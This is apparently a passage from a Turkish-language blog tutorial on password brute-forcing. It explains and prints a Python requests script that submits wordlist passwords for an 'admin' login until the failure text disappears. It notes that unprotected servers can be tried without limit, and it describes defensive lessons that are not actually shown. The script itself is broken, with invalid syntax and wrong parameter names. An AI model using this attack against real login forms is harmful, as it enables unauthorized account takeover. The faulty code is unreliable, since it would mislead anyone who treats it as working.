Alttaki örnek script üzerinde görüldüğü gibi işe öncelikle requests kütüphanemizi import ederek başlıyoruz.
Sonrasında bruteForce fonksiyonumuzu yazmaya başlıyoruz.
İlk olarak BASE_URL üzerinden sitedeki giriş ekranı (form) bulunan linki tanımlıyoruz.
Artık daha önceden hazırladığımız WORDLIST (parola tahmini için kelime listesi) tanımlamasını yapıyoruz ve ‘r’ read ve .readlines() parametresiyle satır satır okuyoruz.
Okuduğumuz bu şifreleri for döngüsü içine sokarak requests.post ile giriş formunu doldurmuşuz gibi istek olarak hedef sunucuya gönderiyoruz.
Güvenlik önlemi alınmayan, zaman, giriş hakkı sınırlaması bulunmayan ya da karakter doğrulaması olmayan sunucularda dilediğiniz kadar deneme yapabilir ve doğru şifreyi buluna kadar sistemi yorabilirsiniz.
import requests
def bruteForce():
BASE_URL='<site url girin>'
WORDLIST= open('<wordlist path yaz>','r').readlines()
for lines in WORDLIST:
password=lines.strip()
RQ=requests.post(BASE_URL, DATA=('id':'admin','sifre': password,'gonder':'submit')
if 'giris basarisiz' not in RQ.content:
print("sifre : "+ password)
break
else:
print("hatalı deneme")Yukarıda sadece basit bir burte force saldırısına değindik ve işleyişini gördük.
Bu işleyişten alınacak dersleri ise son paragrafta belirttim. Artık bu saldırıyı tanıyor ve ne önlem almanız gerektiğini biliyorsunuz.
Güvenli ve mutlu günler dileriz. :)